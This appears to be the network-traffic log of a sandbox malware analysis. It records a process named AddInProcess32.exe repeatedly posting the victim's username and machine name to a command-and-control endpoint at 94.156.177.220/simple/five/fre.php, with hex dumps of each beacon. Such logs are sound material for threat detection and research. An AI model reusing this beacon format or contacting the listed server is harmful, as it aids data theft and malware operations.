Oct 24, 2024 21:23:31.085553885 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:32.518603086 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49175	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:32.712872982 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:32.718723059 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:33.891859055 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 24, 2024 21:23:34.305427074 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 24, 2024 21:23:34.306662083 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49176	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:34.313005924 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:34.319093943 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:36.394407034 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49177	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:36.544878006 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:36.550345898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:37.743582964 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49178	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:37.883402109 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:37.888748884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:38.952395916 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49179	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:39.088957071 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:39.094383955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:40.185728073 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49180	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:40.346195936 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:40.351612091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:41.449007034 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49181	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:41.632150888 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:41.637883902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:42.717688084 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49182	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:42.898226023 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:42.903712988 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:43.957998037 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49183	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:44.166310072 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:44.172010899 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:45.248500109 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49184	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:45.416917086 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:45.422327042 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:46.621321917 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49185	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:46.874614954 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:46.883325100 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:47.965843916 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49186	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:48.401350975 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:48.406791925 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:49.409387112 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49187	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:49.560369015 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:49.566653013 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:50.569111109 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49188	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:50.746375084 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:50.751878023 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:51.776329041 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49189	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:51.955508947 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:51.961137056 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:53.031290054 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49190	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:53.499456882 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:53.505309105 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:55.553410053 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49191	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:55.720447063 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:55.726103067 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:56.808187962 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49192	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:56.966893911 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:56.972372055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:59.106962919 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 24, 2024 21:23:59.107737064 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 24, 2024 21:23:59.108335018 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49193	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:59.269597054 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
